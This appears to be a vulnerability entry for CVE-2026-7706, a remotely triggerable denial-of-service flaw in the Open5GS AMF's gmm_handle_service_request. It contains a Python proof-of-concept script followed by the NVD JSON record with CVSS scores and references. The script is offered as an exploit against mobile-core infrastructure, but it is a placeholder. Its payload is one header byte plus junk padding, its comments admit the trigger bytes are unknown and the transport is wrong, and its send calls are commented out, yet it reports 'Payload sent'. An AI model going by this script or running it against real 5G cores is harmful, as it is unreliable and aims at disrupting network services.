CVE-2026-7706

import socket import struct # PoC for CVE-2026-7706 (Open5GS DoS) # This script sends a crafted packet to trigger the crash in gmm_handle_service_request # Note: Open5GS AMF typically uses SCTP, this is a simplified demonstration. def send_exploit(target_ip, target_port): # Constructing a malformed NAS Service Request payload # This payload is designed to hit the vulnerable logic in gmm-handler.c # Specific bytes may vary based on the exact vulnerability trigger # NAS Message Header (Security protected NAS message placeholder) nas_header = b'\x7e' # Protocol Discriminator: Mobility Management messages nas_header += b'\x00' # Security header type: Plain NAS message # Malformed Service Request content # Triggering the invalid access in the target function payload = nas_header + b'\x0c' * 100 # Filling with padding/junk data try: # Attempting to connect to the AMF interface (Port 38412 is standard for N2/SCTP) # This example uses TCP for simplicity, actual exploit requires SCTP association print(f"[*] Sending exploit payload to {target_ip}:{target_port}") # In a real scenario, use pysctp or similar to send over SCTP # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((target_ip, target_port)) # sock.send(payload) # sock.close() print("[+] Payload sent. Check if AMF crashed.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP target = "192.168.1.100" port = 38412 send_exploit(target, port)

{"cve": {"id": "CVE-2026-7706", "sourceIdentifier": "[email protected]", "published": "2026-05-03T23:16:41.850", "lastModified": "2026-05-05T19:13:44.530", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Open5GS up to 2.7.7. This issue affects the function gmm_handle_service_request of the file /src/amf/gmm-handler.c of the component AMF. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/4409", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/805698", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360882", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360882/cti", "source": "[email protected]"}]}}